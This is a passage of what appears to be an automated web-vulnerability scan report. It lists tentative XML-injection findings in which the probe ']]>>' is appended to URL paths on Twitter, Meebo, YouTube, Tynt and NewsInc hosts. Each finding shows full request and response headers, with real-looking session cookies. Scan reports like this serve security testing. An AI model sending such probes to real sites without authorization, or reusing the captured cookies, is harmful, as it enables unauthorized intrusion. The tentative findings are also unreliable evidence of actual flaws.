Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Cookie: d=EEsBGgHdB7vR8r2IHh2EoRA; qoo=OPT_OUT

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 345
Date: Sat, 17 Sep 2011 17:21:03 GMT
Server: QS

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...
8.58. http://platform.twitter.com/widgets/follow_button.html [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://platform.twitter.com
Path:   /widgets/follow_button.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /widgets]]>>/follow_button.html?screen_name=localcom HTTP/1.1
Host: platform.twitter.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=v1%3A131479755238577138; __utma=43838368.1721518288.1314976448.1315460719.1315936872.4; __utmz=43838368.1315936872.4.4.utmcsr=burlingtonfreepress.com|utmccn=(referral)|utmcmd=referral|utmcct=/apps/pbcs.dll/article; k=50.23.123.106.1316084567946622

Response

HTTP/1.1 404 Not Found
Content-Type: application/xml
Date: Sat, 17 Sep 2011 16:28:28 GMT
Content-Length: 295
Connection: close
P3P: CP="CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV INT"

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Key>widgets]]&gt;&gt;/follow_button.html</Key><RequestId>BC8BBC3CE54CC65F</Requ
...[SNIP]...
8.59. http://platform.twitter.com/widgets/follow_button.html [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://platform.twitter.com
Path:   /widgets/follow_button.html

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /widgets/follow_button.html]]>>?screen_name=localcom HTTP/1.1
Host: platform.twitter.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=v1%3A131479755238577138; __utma=43838368.1721518288.1314976448.1315460719.1315936872.4; __utmz=43838368.1315936872.4.4.utmcsr=burlingtonfreepress.com|utmccn=(referral)|utmcmd=referral|utmcct=/apps/pbcs.dll/article; k=50.23.123.106.1316084567946622

Response

HTTP/1.1 404 Not Found
Content-Type: application/xml
Date: Sat, 17 Sep 2011 16:28:28 GMT
Content-Length: 295
Connection: close
P3P: CP="CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV INT"

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Key>widgets/follow_button.html]]&gt;&gt;</Key><RequestId>E2FF54AB812096CC</Requ
...[SNIP]...
8.60. http://platform.twitter.com/widgets/images/f.gif [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://platform.twitter.com
Path:   /widgets/images/f.gif

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /widgets]]>>/images/f.gif?screen_name=localcom&twttr_variant=1.1&twttr_referrer=http%3A%2F%2Fwww.local.com%2F&twttr_li=0&twttr_widget=0 HTTP/1.1
Host: platform.twitter.com
Proxy-Connection: keep-alive
Referer: http://platform.twitter.com/widgets/follow_button.html?screen_name=localcom
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=v1%3A131479755238577138; __utma=43838368.1721518288.1314976448.1315460719.1315936872.4; __utmz=43838368.1315936872.4.4.utmcsr=burlingtonfreepress.com|utmccn=(referral)|utmcmd=referral|utmcct=/apps/pbcs.dll/article; k=50.23.123.106.1316084567946622

Response

HTTP/1.1 404 Not Found
Content-Type: application/xml
Date: Sat, 17 Sep 2011 16:28:41 GMT
Content-Length: 289
Connection: close
P3P: CP="CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV INT"

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Key>widgets]]&gt;&gt;/images/f.gif</Key><RequestId>2304F1BD45F5CC4D</RequestId>
...[SNIP]...
8.61. http://platform.twitter.com/widgets/images/f.gif [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://platform.twitter.com
Path:   /widgets/images/f.gif

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /widgets/images]]>>/f.gif?screen_name=localcom&twttr_variant=1.1&twttr_referrer=http%3A%2F%2Fwww.local.com%2F&twttr_li=0&twttr_widget=0 HTTP/1.1
Host: platform.twitter.com
Proxy-Connection: keep-alive
Referer: http://platform.twitter.com/widgets/follow_button.html?screen_name=localcom
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=v1%3A131479755238577138; __utma=43838368.1721518288.1314976448.1315460719.1315936872.4; __utmz=43838368.1315936872.4.4.utmcsr=burlingtonfreepress.com|utmccn=(referral)|utmcmd=referral|utmcct=/apps/pbcs.dll/article; k=50.23.123.106.1316084567946622

Response

HTTP/1.1 404 Not Found
Content-Type: application/xml
Date: Sat, 17 Sep 2011 16:28:42 GMT
Content-Length: 289
Connection: close
P3P: CP="CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV INT"

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Key>widgets/images]]&gt;&gt;/f.gif</Key><RequestId>2CDCA7D442FB2283</RequestId>
...[SNIP]...
8.62. http://platform.twitter.com/widgets/images/f.gif [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://platform.twitter.com
Path:   /widgets/images/f.gif

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /widgets/images/f.gif]]>>?screen_name=localcom&twttr_variant=1.1&twttr_referrer=http%3A%2F%2Fwww.local.com%2F&twttr_li=0&twttr_widget=0 HTTP/1.1
Host: platform.twitter.com
Proxy-Connection: keep-alive
Referer: http://platform.twitter.com/widgets/follow_button.html?screen_name=localcom
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=v1%3A131479755238577138; __utma=43838368.1721518288.1314976448.1315460719.1315936872.4; __utmz=43838368.1315936872.4.4.utmcsr=burlingtonfreepress.com|utmccn=(referral)|utmcmd=referral|utmcct=/apps/pbcs.dll/article; k=50.23.123.106.1316084567946622

Response

HTTP/1.1 404 Not Found
Content-Type: application/xml
Date: Sat, 17 Sep 2011 16:28:43 GMT
Content-Length: 289
Connection: close
P3P: CP="CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV INT"

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Key>widgets/images/f.gif]]&gt;&gt;</Key><RequestId>3BF5C62DEF27D4B6</RequestId>
...[SNIP]...
8.63. http://platform.twitter.com/widgets/images/t.gif [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://platform.twitter.com
Path:   /widgets/images/t.gif

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /widgets]]>>/images/t.gif?_=1316294768523&count=none&id=twitter_tweet_button_0&lang=en&original_referer=http%3A%2F%2Fellegirl.elle.com%2F&text=Teen%20Fashion%20%E2%80%93%20Hair%20and%20Makeup%20Tips%20for%20Teens%20%E2%80%93%20ELLEgirl.com&url=http%3A%2F%2Fellegirl.elle.com%2F&twttr_referrer=http%3A%2F%2Fellegirl.elle.com%2F&twttr_li=0&twttr_widget=1 HTTP/1.1
Host: platform.twitter.com
Proxy-Connection: keep-alive
Referer: http://platform.twitter.com/widgets/tweet_button.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=v1%3A131479755238577138; __utma=43838368.1721518288.1314976448.1315460719.1315936872.4; __utmz=43838368.1315936872.4.4.utmcsr=burlingtonfreepress.com|utmccn=(referral)|utmcmd=referral|utmcct=/apps/pbcs.dll/article; k=50.23.123.106.1316084567946622

Response

HTTP/1.1 404 Not Found
Content-Type: application/xml
Date: Sat, 17 Sep 2011 16:33:03 GMT
Content-Length: 289
Connection: close
P3P: CP="CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV INT"

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Key>widgets]]&gt;&gt;/images/t.gif</Key><RequestId>C21A0AD01804AB76</RequestId>
...[SNIP]...
8.64. http://platform.twitter.com/widgets/images/t.gif [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://platform.twitter.com
Path:   /widgets/images/t.gif

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /widgets/images]]>>/t.gif?_=1316294768523&count=none&id=twitter_tweet_button_0&lang=en&original_referer=http%3A%2F%2Fellegirl.elle.com%2F&text=Teen%20Fashion%20%E2%80%93%20Hair%20and%20Makeup%20Tips%20for%20Teens%20%E2%80%93%20ELLEgirl.com&url=http%3A%2F%2Fellegirl.elle.com%2F&twttr_referrer=http%3A%2F%2Fellegirl.elle.com%2F&twttr_li=0&twttr_widget=1 HTTP/1.1
Host: platform.twitter.com
Proxy-Connection: keep-alive
Referer: http://platform.twitter.com/widgets/tweet_button.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=v1%3A131479755238577138; __utma=43838368.1721518288.1314976448.1315460719.1315936872.4; __utmz=43838368.1315936872.4.4.utmcsr=burlingtonfreepress.com|utmccn=(referral)|utmcmd=referral|utmcct=/apps/pbcs.dll/article; k=50.23.123.106.1316084567946622

Response

HTTP/1.1 404 Not Found
Content-Type: application/xml
Date: Sat, 17 Sep 2011 16:33:04 GMT
Content-Length: 289
Connection: close
P3P: CP="CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV INT"

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Key>widgets/images]]&gt;&gt;/t.gif</Key><RequestId>9CE40EC207382BE7</RequestId>
...[SNIP]...
8.65. http://platform.twitter.com/widgets/images/t.gif [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://platform.twitter.com
Path:   /widgets/images/t.gif

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /widgets/images/t.gif]]>>?_=1316294768523&count=none&id=twitter_tweet_button_0&lang=en&original_referer=http%3A%2F%2Fellegirl.elle.com%2F&text=Teen%20Fashion%20%E2%80%93%20Hair%20and%20Makeup%20Tips%20for%20Teens%20%E2%80%93%20ELLEgirl.com&url=http%3A%2F%2Fellegirl.elle.com%2F&twttr_referrer=http%3A%2F%2Fellegirl.elle.com%2F&twttr_li=0&twttr_widget=1 HTTP/1.1
Host: platform.twitter.com
Proxy-Connection: keep-alive
Referer: http://platform.twitter.com/widgets/tweet_button.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=v1%3A131479755238577138; __utma=43838368.1721518288.1314976448.1315460719.1315936872.4; __utmz=43838368.1315936872.4.4.utmcsr=burlingtonfreepress.com|utmccn=(referral)|utmcmd=referral|utmcct=/apps/pbcs.dll/article; k=50.23.123.106.1316084567946622

Response

HTTP/1.1 404 Not Found
Content-Type: application/xml
Date: Sat, 17 Sep 2011 16:33:05 GMT
Content-Length: 289
Connection: close
P3P: CP="CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV INT"

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Key>widgets/images/t.gif]]&gt;&gt;</Key><RequestId>449BE2CF654E8825</RequestId>
...[SNIP]...
8.66. http://s.meebocdn.net/cim/script/feeds_v92_cim_11_12_5.en.js [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s.meebocdn.net
Path:   /cim/script/feeds_v92_cim_11_12_5.en.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /cim]]>>/script/feeds_v92_cim_11_12_5.en.js?1315867186 HTTP/1.1
Host: s.meebocdn.net
Proxy-Connection: keep-alive
Referer: http://www.meebo.com/cim/sandbox.php?lang=en&version=v92_cim_11_12_5&protocol=http%3A&network=seventeen
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Server: lighttpd/1.4.19
Date: Sat, 17 Sep 2011 16:36:25 GMT
Connection: close
Vary: Accept-Encoding

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...
8.67. http://s.meebocdn.net/cim/script/feeds_v92_cim_11_12_5.en.js [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s.meebocdn.net
Path:   /cim/script/feeds_v92_cim_11_12_5.en.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /cim/script]]>>/feeds_v92_cim_11_12_5.en.js?1315867186 HTTP/1.1
Host: s.meebocdn.net
Proxy-Connection: keep-alive
Referer: http://www.meebo.com/cim/sandbox.php?lang=en&version=v92_cim_11_12_5&protocol=http%3A&network=seventeen
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Server: lighttpd/1.4.19
Date: Sat, 17 Sep 2011 16:36:25 GMT
Connection: close
Vary: Accept-Encoding

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...
8.68. http://s.meebocdn.net/cim/script/feeds_v92_cim_11_12_5.en.js [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s.meebocdn.net
Path:   /cim/script/feeds_v92_cim_11_12_5.en.js

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /cim/script/feeds_v92_cim_11_12_5.en.js]]>>?1315867186 HTTP/1.1
Host: s.meebocdn.net
Proxy-Connection: keep-alive
Referer: http://www.meebo.com/cim/sandbox.php?lang=en&version=v92_cim_11_12_5&protocol=http%3A&network=seventeen
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Server: lighttpd/1.4.19
Date: Sat, 17 Sep 2011 16:36:25 GMT
Connection: close
Vary: Accept-Encoding

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...
8.69. http://s.ytimg.com/yt/swfbin/cps-vflP_j6Bm.swf [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s.ytimg.com
Path:   /yt/swfbin/cps-vflP_j6Bm.swf

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /yt/swfbin]]>>/cps-vflP_j6Bm.swf HTTP/1.1
Host: s.ytimg.com
Proxy-Connection: keep-alive
Referer: http://www.youtube-nocookie.com/v/IOje-N90P38&hl=en_US&fs=1&
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Cache-Control: public, max-age=31104000
Expires: Sun, 26 Dec 2032 06:12:01 GMT
Content-Type: text/html
Content-Length: 345
Date: Sat, 17 Sep 2011 16:48:11 GMT
Server: lighttpd-yt/1.4.18

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...
8.70. http://s.ytimg.com/yt/swfbin/cps-vflP_j6Bm.swf [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://s.ytimg.com
Path:   /yt/swfbin/cps-vflP_j6Bm.swf

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /yt/swfbin/cps-vflP_j6Bm.swf]]>> HTTP/1.1
Host: s.ytimg.com
Proxy-Connection: keep-alive
Referer: http://www.youtube-nocookie.com/v/IOje-N90P38&hl=en_US&fs=1&
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Sat, 17 Sep 2011 16:48:12 GMT
Server: lighttpd-yt/1.4.18

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...
8.71. http://tcr.tynt.com/javascripts/Tracer.js [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://tcr.tynt.com
Path:   /javascripts/Tracer.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /javascripts]]>>/Tracer.js?user=acOw60thSr3PRGab7jrHcU&s=70 HTTP/1.1
Host: tcr.tynt.com
Proxy-Connection: keep-alive
Referer: http://www.thedailygreen.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=CgUVaU5iygRBfFDrAw5SAg==

Response

HTTP/1.1 404 Not Found
Cache-Control: max-age=1800
Content-Type: text/html
Date: Sat, 17 Sep 2011 16:28:18 GMT
Expires: Sat, 17 Sep 2011 16:58:18 GMT
Server: EOS (lax001/54E5)
Content-Length: 454

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...
8.72. http://tcr.tynt.com/javascripts/Tracer.js [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://tcr.tynt.com
Path:   /javascripts/Tracer.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /javascripts/Tracer.js]]>>?user=acOw60thSr3PRGab7jrHcU&s=70 HTTP/1.1
Host: tcr.tynt.com
Proxy-Connection: keep-alive
Referer: http://www.thedailygreen.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=CgUVaU5iygRBfFDrAw5SAg==

Response

HTTP/1.1 404 Not Found
Cache-Control: max-age=1800
Content-Type: text/html
Date: Sat, 17 Sep 2011 16:28:18 GMT
Expires: Sat, 17 Sep 2011 16:58:18 GMT
Server: EOS (lax001/54E5)
Content-Length: 454

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...
8.73. http://widget.newsinc.com/_fw/common/toppicks_common1.html [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://widget.newsinc.com
Path:   /_fw/common/toppicks_common1.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /_fw]]>>/common/toppicks_common1.html?wid=1709&cid=507&freewheel=90009&sitesection=stamford_hom&ZoneID=50912 HTTP/1.1
Host: widget.newsinc.com
Proxy-Connection: keep-alive
Referer: http://widget.newsinc.com/ndn_toppicks.html?wid=1709&cid=507&freewheel=90009&sitesection=stamford_hom
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1483107276-1315849734503; ANALYTICS_USER_TOKEN=802756E5-8724-4943-AEFB-8B9150565A781316021953542

Response

HTTP/1.1 404 Not Found
x-amz-request-id: 4BCC01CF09358BF9
x-amz-id-2: NCAYj3RgleahyU9q1+pkBhgo21FWO2GcThgUudyCALgseYvzqLnQADRQ+FwEuXJ4
Content-Type: application/xml
Date: Sat, 17 Sep 2011 16:24:07 GMT
Server: AmazonS3
Content-Length: 301

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Key>_fw]]&gt;&gt;/common/toppicks_common1.html</Key><RequestId>4BCC01CF09358BF9
...[SNIP]...
8.74. http://widget.newsinc.com/_fw/common/toppicks_common1.html [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://widget.newsinc.com
Path:   /_fw/common/toppicks_common1.html

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /_fw/common]]>>/toppicks_common1.html?wid=1709&cid=507&freewheel=90009&sitesection=stamford_hom&ZoneID=50912 HTTP/1.1
Host: widget.newsinc.com
Proxy-Connection: keep-alive
Referer: http://widget.newsinc.com/ndn_toppicks.html?wid=1709&cid=507&freewheel=90009&sitesection=stamford_hom
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
